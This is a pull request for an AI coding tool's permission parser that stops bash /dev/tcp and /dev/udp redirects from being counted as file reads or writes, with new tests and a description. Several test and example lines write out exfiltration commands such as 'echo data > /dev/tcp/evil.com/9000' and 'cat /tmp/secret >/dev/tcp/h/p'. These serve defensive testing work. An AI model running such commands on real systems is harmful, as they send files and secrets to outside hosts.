### PR TITLE
fix(permissions): do not model /dev/tcp and /dev/udp redirects as file I/O

### DIFF
--- a/packages/core/src/permissions/shell-semantics.test.ts
+++ b/packages/core/src/permissions/shell-semantics.test.ts
@@ -477,6 +477,58 @@ describe('extractShellOperations', () => {
     });
   });
 
+  it('redirect > /dev/tcp: network socket, not a file write', () => {
+    const ops = extractShellOperations('echo data > /dev/tcp/evil.com/9000', CWD);
+    expect(ops).not.toContainEqual(
+      expect.objectContaining({ filePath: '/dev/tcp/evil.com/9000' }),
+    );
+    expect(ops).not.toContainEqual(
+      expect.objectContaining({ virtualTool: 'write_file' }),
+    );
+  });
+
+  it('redirect < /dev/tcp: network socket, not a file read', () => {
+    const ops = extractShellOperations('cat < /dev/tcp/h/1234', CWD);
+    expect(ops).not.toContainEqual(
+      expect.objectContaining({ filePath: '/dev/tcp/h/1234' }),
+    );
+    expect(ops).not.toContainEqual(
+      expect.objectContaining({ virtualTool: 'read_file' }),
+    );
+  });
+
+  it('redirect > /dev/udp: network socket, not a file write', () => {
+    const ops = extractShellOperations('echo x > /dev/udp/h/53', CWD);
+    expect(ops).not.toContainEqual(
+      expect.objectContaining({ filePath: '/dev/udp/h/53' }),
+    );
+  });
+
+  it('combined redirect >/dev/tcp without space: network socket, not a file', () => {
+    const ops = extractShellOperations('cat /tmp/secret >/dev/tcp/h/p', CWD);
+    expect(ops).not.toContainEqual(
+      expect.objectContaining({ filePath: '/dev/tcp/h/p' }),
+    );
+    // The real file read is still reported.
+    expect(ops).toContainEqual({
+      virtualTool: 'read_file',
+      filePath: '/tmp/secret',
+    });
+  });
+
+  it('regression: ordinary file redirects still tracked', () => {
+    const writeOps = extractShellOperations('echo hi > out.txt', CWD);
+    expect(writeOps).toContainEqual({
+      virtualTool: 'write_file',
+      filePath: `${CWD}/out.txt`,
+    });
+    const readOps = extractShellOperations('sort < in.txt', CWD);
+    expect(readOps).toContainEqual({
+      virtualTool: 'read_file',
+      filePath: `${CWD}/in.txt`,
+    });
+  });
+
   // ── curl / wget ────────────────────────────────────────────────────────────
 
   it('curl: extracts domain', () => {

--- a/packages/core/src/permissions/shell-semantics.ts
+++ b/packages/core/src/permissions/shell-semantics.ts
@@ -217,6 +217,15 @@ interface RedirectResult {
 }
 
 /**
+ * A bash /dev/tcp/<host>/<port> or /dev/udp/... redirect target opens a
+ * network socket, not a file. Such targets must not be reported as file
+ * reads/writes.
+ */
+function isNetworkPseudoDevice(target: string): boolean {
+  return /^\/dev\/(tcp|udp)\//.test(target);
+}
+
+/**
  * Extract I/O redirections from a token array.
  *
  * Modifies `tokens` in-place to remove redirect operators and their targets.
@@ -239,7 +248,9 @@ function extractRedirects(tokens: string[], cwd: string): RedirectResult {
     if (tok === '>' || tok === '1>') {
       const target = tokens[i + 1];
       if (target && looksLikePath(target)) {
-        writeFiles.push(resolvePath(target, cwd));
+        if (!isNetworkPseudoDevice(target)) {
+          writeFiles.push(resolvePath(target, cwd));
+        }
         toRemove.add(i);
         toRemove.add(i + 1);
         i++;
@@ -247,7 +258,9 @@ function extractRedirects(tokens: string[], cwd: string): RedirectResult {
     } else if (tok === '>>' || tok === '1>>') {
       const target = tokens[i + 1];
       if (target && looksLikePath(target)) {
-        writeFiles.push(resolvePath(target, cwd));
+        if (!isNetworkPseudoDevice(target)) {
+          writeFiles.push(resolvePath(target, cwd));
+        }
         toRemove.add(i);
         toRemove.add(i + 1);
         i++;
@@ -261,7 +274,9 @@ function extractRedirects(tokens: string[], cwd: string): RedirectResult {
     } else if (tok === '<') {
       const target = tokens[i + 1];
       if (target && looksLikePath(target)) {
-        readFiles.push(resolvePath(target, cwd));
+        if (!isNetworkPseudoDevice(target)) {
+          readFiles.push(resolvePath(target, cwd));
+        }
         toRemove.add(i);
         toRemove.add(i + 1);
         i++;
@@ -270,7 +285,11 @@ function extractRedirects(tokens: string[], cwd: string): RedirectResult {
       // stderr / combined redirect — consume target
       const target = tokens[i + 1];
       if (target) {
-        if (target !== '/dev/null' && looksLikePath(target)) {
+        if (
+          target !== '/dev/null' &&
+          looksLikePath(target) &&
+          !isNetworkPseudoDevice(target)
+        ) {
           writeFiles.push(resolvePath(target, cwd));
         }
         toRemove.add(i);
@@ -288,7 +307,11 @@ function extractRedirects(tokens: string[], cwd: string): RedirectResult {
           toRemove.add(i);
           continue;
         }
-        if (target !== '/dev/null' && looksLikePath(target)) {
+        if (
+          target !== '/dev/null' &&
+          looksLikePath(target) &&
+          !isNetworkPseudoDevice(target)
+        ) {
           if (op === '<') {
             readFiles.push(resolvePath(target, cwd));
           } else {


### PR DESCRIPTION
## Problem

`extractRedirects` in `packages/core/src/permissions/shell-semantics.ts` treats
every redirect target that passes `looksLikePath` as a file read or write. That
includes bash's network pseudo-devices:

```sh
echo data > /dev/tcp/evil.com/9000     # opens a TCP socket, not a file
cat        < /dev/tcp/host/1234        # reads from a socket
echo x     > /dev/udp/host/53
```

A redirect to `/dev/tcp/<host>/<port>` (or `/dev/udp/...`) makes bash open a
**network socket**; it does not touch the filesystem. Modeling it as a
`write_file` / `read_file` virtual op is incorrect and has two user-visible
consequences:

1. **False positive against a bare `Write`/`Read` rule.** A rule with no
   specifier matches any `write_file` op, so a user who set `permissions.deny`
   / `.ask` on writes sees a *network egress* surfaced and described as a file
   write to `/dev/tcp/evil.com/9000` — a misleading prompt/verdict.
2. **Never matches a path-scoped file rule.** The literal string
   `/dev/tcp/...` is not a real file any path glob meant to protect, so the op
   is dead weight that can only ever mis-fire on (1).

## Fix

Add a small predicate and skip pseudo-device targets at every redirect push
site. Token stripping (`toRemove`) is unchanged, so the redirect operators are
still removed from the parsed command exactly as before — only the spurious
file read/write op is suppressed.

```ts
function isNetworkPseudoDevice(target: string): boolean {
  return /^\/dev\/(tcp|udp)\//.test(target);
}
```

The check runs on the raw redirect token (which, being absolute, is identical
pre/post `resolvePath`) in all five branches: `>`/`1>`, `>>`/`1>>`, `<`, the
`2>`/`2>>`/`&>`/`&>>` series, and the combined-token form (`>/dev/tcp/h/p`).

## Tests

`packages/core/src/permissions/shell-semantics.test.ts` gains assertions that
`> /dev/tcp/...`, `< /dev/tcp/...`, `> /dev/udp/...`, and the no-space combined
form no longer emit a `write_file`/`read_file` op, plus a regression test that
ordinary `> out.txt` / `< in.txt` are still tracked (and that the real read in
`cat /tmp/secret > /dev/tcp/h/p` is still reported). Full file suite green
(96 pre-existing + 5 new); the consumer suites (`permission-manager.test.ts`,
`autoMode.test.ts`) remain green.

## Scope (intentional)

- This is a correctness fix for the file/socket modeling only. Whether
  qwen-code should additionally model `/dev/tcp` egress as a network virtual op
  (so a `WebFetch`/network rule could govern it) is a separate feature with its
  own design questions (host/port extraction, rule kind, TCP vs UDP) and is not
  attempted here.
- The pre-existing `/dev/null` handling asymmetry (special-cased only in the
  `2>`/`&>` and combined branches) is left untouched as out of scope; a phantom
  write to `/dev/null` can only escalate, never bypass, a permission decision.
